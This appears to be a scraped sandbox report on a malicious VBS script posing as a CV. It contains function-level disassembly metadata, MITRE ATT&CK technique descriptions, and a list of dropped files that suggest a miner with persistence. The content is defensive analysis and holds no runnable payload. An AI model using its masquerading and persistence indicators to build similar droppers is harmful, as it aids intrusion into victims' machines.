Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs
String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
API String ID: 1795875747-1623556331
Opcode ID: 6e989c6b034e261f19ad8a64550294befd6c6f9970ba9176836173222068f0b5
Instruction ID: 5b43ef0116c1108613d0bae327fae3b4f79d5f8b5aa047afc2ae97f03eca99f0
Opcode Fuzzy Hash: 6e989c6b034e261f19ad8a64550294befd6c6f9970ba9176836173222068f0b5
Instruction Fuzzy Hash: 6B01AD35708204ABCA09A7A8A995A7EB7A7EFC8310B18841BF506877C1DB75B811DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D568B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,?,00000000,00000000,00000000,00000000,?,?,?,009D55F5,00000000,00000000), ref: 009D56B8

Strings

Internal Error: The failure in hardware (RAM or CPU), OS or program, xrefs: 009D569A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: FormatMessage
String ID: Internal Error: The failure in hardware (RAM or CPU), OS or program
API String ID: 1306739567-2427807339
Opcode ID: aebedf836116e4b70bf9c9c9c458124efc193e9ff2617f83d9e62834d2e9f31d
Instruction ID: d60acd5f96836e98b32b348e81d33f7b06f8437235dcc917f1e0d39b8d988a8d
Opcode Fuzzy Hash: aebedf836116e4b70bf9c9c9c458124efc193e9ff2617f83d9e62834d2e9f31d
Instruction Fuzzy Hash: 99E02B78284600BF9F05A750CC06DBF336CDBD07053A0C906F80291354E6958F0267B4

Uniqueness

Uniqueness Score: -1.00%

Function 00A0710C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0713C
fputs.MSVCRT ref: 00A07145

Strings

= , xrefs: 00A07140

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs
String ID: =
API String ID: 1795875747-2525689732
Opcode ID: f1c0d3af22f27f85a09ac611d779659408e6b7de4a2a48a6ac10a8b161dcee0e
Instruction ID: b9a2e54cbf1a439c7cfcf7d3ed790f863011ae9e153a2bff5fac6e1babdd11dd
Opcode Fuzzy Hash: f1c0d3af22f27f85a09ac611d779659408e6b7de4a2a48a6ac10a8b161dcee0e
Instruction Fuzzy Hash: B0E0D839E0011967CF00E7DDAC4586F3B79FBC0311B100922E911872D0F731E8229BE0

Uniqueness

Uniqueness Score: -1.00%

Function 009E1F9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

OpenEventW.KERNEL32(00000002,00000000,?,Unsupported Map data size,?,?,009E1F5B,?,?,?,00000000), ref: 009E1FB0
GetLastError.KERNEL32(?,009E1F5B,?,?,?,00000000), ref: 009E1FBD

Strings

Unsupported Map data size, xrefs: 009E1FA3

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorEventLastOpen
String ID: Unsupported Map data size
API String ID: 330508107-1172413320
Opcode ID: d940a1a7ad63e22f7279522498bee46b25fb4b85b4439266decb0167f1c4d75f
Instruction ID: 1100b8576195ff297754830b7605b2e1c41746da8c75ae71c305638599cd2189
Opcode Fuzzy Hash: d940a1a7ad63e22f7279522498bee46b25fb4b85b4439266decb0167f1c4d75f
Instruction Fuzzy Hash: 4DE09275604208EBEB20EFA1DD07B9EB7FCEF80345F204059F401E2190EB716E00AA64

Uniqueness

Uniqueness Score: -1.00%

Function 00A083B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A083C3
fputs.MSVCRT ref: 00A083CC

Part of subcall function 009D224A: fputs.MSVCRT ref: 009D2267

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Strings

Archives, xrefs: 00A083C2

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$fputc
String ID: Archives
API String ID: 1185151155-454332015
Opcode ID: 0c4e0cdf95f9574ee6c82bb9867c0a412d5ea40a097564dc80fcdbe90847b4d8
Instruction ID: d59a43604dc0c858432a6c52952c0b8b28b458e53ff6cee9273c1104a9876658
Opcode Fuzzy Hash: 0c4e0cdf95f9574ee6c82bb9867c0a412d5ea40a097564dc80fcdbe90847b4d8
Instruction Fuzzy Hash: F2D0C2362002006BCB107BA89C15C1FBAA6FFD83107014C1FF480032A0CA7148259FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A3641C Relevance: 5.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 00A36CA0: EnterCriticalSection.KERNEL32(?,?,?,00A36439), ref: 00A36CA8
Part of subcall function 00A36CA0: LeaveCriticalSection.KERNEL32(?,?,?,00A36439), ref: 00A36CB2

EnterCriticalSection.KERNEL32(?), ref: 00A365FE
LeaveCriticalSection.KERNEL32(?), ref: 00A36618
EnterCriticalSection.KERNEL32(?), ref: 00A36682
LeaveCriticalSection.KERNEL32(?), ref: 00A366A8
EnterCriticalSection.KERNEL32(?), ref: 00A3670E
LeaveCriticalSection.KERNEL32(?), ref: 00A36746

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b1a4b5b09e29a8f93e6d839b52666a9cfdcada8bff333dcadf8511ee045164af
Instruction ID: 908b42efbf525ca8df7cc75a2404e772ac84ba535a7c34e6f532a6d08074abae
Opcode Fuzzy Hash: b1a4b5b09e29a8f93e6d839b52666a9cfdcada8bff333dcadf8511ee045164af
Instruction Fuzzy Hash: DB612575604701AFC764DF24C184A6BB7F2FF98354F608A2DF8AA87255EB30E849CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A2CF20 Relevance: 5.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00A37D90: WaitForSingleObject.KERNEL32(?,000000FF,009E9D84,?), ref: 00A37D93
Part of subcall function 00A37D90: GetLastError.KERNEL32(?,000000FF,009E9D84,?), ref: 00A37D9E

EnterCriticalSection.KERNEL32(?), ref: 00A2CF6B
EnterCriticalSection.KERNEL32(?), ref: 00A2CF74
LeaveCriticalSection.KERNEL32(?), ref: 00A2CF96
LeaveCriticalSection.KERNEL32(?), ref: 00A2CF99

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
String ID:
API String ID: 2116739831-0
Opcode ID: 950cd6c5df38bd63586664c83b8709acac080e948c77e2fc1c5a107421616190
Instruction ID: 08b99f3401bd605c24d59d06b18c3aaa3b7b35891d7390e23b7414d3a73606bb
Opcode Fuzzy Hash: 950cd6c5df38bd63586664c83b8709acac080e948c77e2fc1c5a107421616190
Instruction Fuzzy Hash: 94418F75604B059FC728DF38D990ADAF3E5FF48310F00862DE5AA43641DB35B995CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009FBBB7 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009FBBCD
memcmp.MSVCRT ref: 009FBBE8
memcmp.MSVCRT ref: 009FBBFC

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 5bc093bf28080a23993c133fe1b69b7c68a7cbf6778532e4f037e093dfc729f6
Instruction ID: 56939c9892782cdb5b3bc1d25c9de27c17d413569eca699779518856f8e507ce
Opcode Fuzzy Hash: 5bc093bf28080a23993c133fe1b69b7c68a7cbf6778532e4f037e093dfc729f6
Instruction Fuzzy Hash: 6501007174020A7BD7205E18CD03FBAB3A8AB94750F044839FE86EF282E7A4B9509394

Uniqueness

Uniqueness Score: -1.00%

Function 00A09FDB Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00A09FF1
memcmp.MSVCRT ref: 00A0A00C
memcmp.MSVCRT ref: 00A0A020

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: bd91785c5c1bfdf9c989d98f57724da67cbc75a1bc1eaf988c9964613752a858
Instruction ID: 9da725351d3a752015e12a3bd5fd5cbc10ece19359b0c01cca514afd02aa9713
Opcode Fuzzy Hash: bd91785c5c1bfdf9c989d98f57724da67cbc75a1bc1eaf988c9964613752a858
Instruction Fuzzy Hash: 7201C47174030DBBDB109F14DC02FBA73A86BA4750F058839FE4ADE2C2E6B2B9509655

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report curriculum_vitae-copie.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\7g.exe

C:\Users\Public\WindowsUpdate\Update.xml

C:\Users\Public\WindowsUpdate\WinRing0x64.sys

C:\Users\Public\WindowsUpdate\go.exe

C:\Users\Public\WindowsUpdate\mozilla.vbs

C:\Users\Public\WindowsUpdate\mservice.exe

C:\Users\Public\WindowsUpdate\mservice.vbs

C:\Users\Public\WindowsUpdate\ps.exe

C:\Users\Public\WindowsUpdate\sarmat.vbs

C:\Users\Public\gmail.7z

C:\Users\Public\log.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7zr[1].exe

Windows Analysis Report
curriculum_vitae-copie.vbs

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre